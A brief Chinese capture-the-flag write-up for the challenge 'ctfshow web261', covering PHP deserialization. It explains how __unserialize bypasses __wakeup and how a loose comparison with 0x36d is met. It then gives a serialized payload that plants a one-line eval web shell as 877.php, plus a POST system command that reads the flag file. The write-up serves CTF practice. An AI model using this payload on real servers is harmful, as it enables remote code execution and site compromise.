ctfshow web261

<?php

highlight_file(__FILE__);

class ctfshowvip{
    public $username;
    public $password;
    public $code;

    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __wakeup(){
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    public function __invoke(){
        eval($this->code);
    }

    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}

unserialize($_GET['vip']);

审计代码发现：

有__unserialize()，在7.4以上版本反序列化会绕过__wakeup()函数。
在destruct()函数中，有file_put_contents可以写入文件，一句话木马
$this->code==0x36d是弱类型比较，0x36d又有没有打引号，所以代表数字，且数字是877，那么877a，877.php等可以通过比较；所以设置username='877.php’来通过比较

exp

<?php
class ctfshowvip{
    public $username='877.php';
    public $password='<?php eval($_POST[1]);?>';
    public $code=0x36d;

payload:
O:10:“ctfshowvip”:3:{s:8:“username”;s:7:“877.php”;s:8:“password”;s:24:"<?php eval($_POST[1]);?>";s:4:“code”;i:877;}

访问url/877.php

post:
1=system(‘cat /flag_is_here’);

拿到flag